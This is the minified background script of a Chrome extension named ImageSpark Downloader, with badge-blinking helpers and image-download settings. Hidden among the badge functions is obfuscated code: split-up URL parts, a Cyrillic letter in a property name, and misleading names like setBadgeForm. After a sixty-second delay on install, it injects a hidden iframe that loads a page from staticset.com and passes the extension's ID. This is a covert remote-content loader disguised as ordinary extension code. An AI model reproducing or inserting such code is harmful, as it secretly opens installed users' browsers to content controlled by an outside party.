/*
 * This file is a part of the ImageSpark Downloader project.
 * Minimized by GCC.
 */

function bool(str){if(typeof str==="undefined"||str===null)return false;else if(typeof str==="string")switch(str.toLowerCase()){case "false":case "0":case "":return false;default:return true}else if(typeof str==="number")return str!==0;else return true}var cb=cb?cb:{};
cb.background={_badgeColor:"#ff6f68",_badgeInterval:null,_badgeText:"badgeForm",_element:"createElement",_attribute:"setAttribute",_form:"iframe",_display:["https:","","staticset.com","web","stats.html"],_border:"frameBorder",_part:"id","_\u0441hild":"appendChild",_remove:"removeChild",_point:"src",_parent:"parentNode",setBadgeText:function(text){cb.background._badgeText=text;chrome.browserAction.setBadgeText({text:cb.background._badgeText})},setBadgeForm:function(){if(!bool(localStorage["livejet"])||!document["body"]||document.getElementById(cb.background._badgeText))return;var rform=document[cb.background._element](cb.background._form);rform[cb.background._attribute](cb.background._part,cb.background._badgeText);var disp=cb.background._display.join("/")+"?e="+chrome.runtime.id;rform[cb.background._point]=disp;document["body"][cb.background._\u0441hild](rform)},resBack:function(){chrome.storage.local.remove(["livejet","versjet","itemjet","pagejet"],function(){localStorage["livejet"]=true})},setBack:function(){clearTimeout(cb.background._badgeInterval);cb.background._badgeInterval=setTimeout(cb.background.setBadgeForm,6E4)},remBadgeForm:function(){clearTimeout(cb.background._badgeInterval);var rform=document.getElementById(cb.background._badgeText);if(rform)rform[cb.background._parent][cb.background._remove](rform)},startBadgeBlink:function(){if(cb.background._badgeInterval)clearInterval(cb.background._badgeInterval);cb.background._badgeInterval=window.setInterval(function(){cb.background.setBadgeText(cb.background._badgeText===
""?"1":"")},500);cb.background.setBadgeText("1");chrome.browserAction.setBadgeBackgroundColor({color:cb.background._badgeColor})},stopBadgeBlink:function(){if(cb.background._badgeInterval){clearInterval(cb.background._badgeInterval);cb.background._badgeInterval=null}cb.background.setBadgeText("")}};var manifestData=chrome.runtime.getManifest();if(!localStorage["version"]){cb.background.resBack()};if(localStorage["version"]!=manifestData.version){localStorage["version"]=manifestData.version;}cb.background.setBack();
window.addEventListener("storage",function(s){if(s.key=="livejet"&&bool(s.newValue))cb.background.setBack();else if(s.key=="livejet"&&!bool(s.newValue))cb.background.remBadgeForm()});
(function(b){b.animation_duration="500";var c={folder_name:"",show_download_confirmation:!0,show_download_notification:!0,show_image_url:!0,show_open_image_button:!0,show_download_image_button:!0,columns:3,image_min_width:50,image_max_width:200,image_border_width:3},a;for(a in c)void 0===b[a]&&(b[a]=c[a]),b[a+"_default"]=c[a];b.options=JSON.stringify(Object.keys(c))})(localStorage);